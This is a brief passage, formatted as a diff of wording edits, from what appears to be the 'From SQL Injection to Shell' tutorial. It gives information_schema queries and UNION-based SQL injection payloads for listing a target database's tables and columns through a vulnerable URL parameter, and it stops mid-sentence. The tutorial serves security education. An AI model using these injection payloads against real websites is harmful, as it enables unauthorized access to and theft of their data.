From SQL Injection to Shell

 The following queries can be used to retrieve:

-• the list of all tables: SELECT table_name FROM information_schema.tables
+• The list of all tables: SELECT table_name FROM information_schema.tables.

-• the list of all columns: SELECT column_name FROM information_schema.columns
+• The list of all columns: SELECT column_name FROM information_schema.columns.

 By mixing these queries and the previous URL, you can guess what page to access to retrieve information:

-• the list of tables: 1 UNION SELECT 1,table_name,3,4 FROM information_schema.tables
+• The list of tables: 1 UNION SELECT 1,table_name,3,4 FROM information_schema.tables.

-• the list of columns: 1 UNION SELECT 1,column_name,3,4 FROM information_schema.columns
+• The list of columns: 1 UNION SELECT 1,column_name,3,4 FROM information_schema.columns.

 The problem, is that these requests provide you a raw list of all tables and columns, but to query the database and retrieve interesting information, you will need to know what column belongs to what table.
 Hopefully, the table information_schema.columns stores table names: